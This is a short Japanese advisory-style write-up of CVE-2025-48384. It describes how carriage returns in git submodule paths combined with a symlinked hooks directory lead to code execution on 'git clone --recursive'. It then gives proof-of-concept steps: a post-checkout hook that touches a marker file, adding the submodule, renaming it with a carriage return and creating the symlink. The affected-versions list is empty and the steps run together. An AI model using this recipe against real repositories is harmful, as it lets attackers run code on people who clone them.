CVE-2025-48384 は、git における不適切なリンク解決(リンク追従)の脆弱性です。具体的には、.git/config 内でキャリッジリターンを含むファイル名が適切に解析されず、git clone --recursive でリポジトリがクローンされると、サブモジュール内にある git フック実行ファイルを指すシンボリックリンクをサブモジュールのフックディレクトリとして含めることで、任意のコード実行が引き起こされる可能性があります。
Git for Microsoft Windows はこの脆弱性の影響を受けず、主に linux と MacOS 上の特定の git バージョンが影響を受けます。影響を受けるバージョン:
post-checkout git フックを作成する:#!/bin/bash
touch ~/hackedlol
git submodule add https://github.com/<your submodule repo>.git sub を使用してサブモジュールリポジトリを追加するgit mv sub $(printf "sub\r") でキャリッジリターンを追加するprintf "\tpath = \"sub\r\"\n" を出力し、元のパスを削除するln -s .git/modules/sub/hooks sub で作成する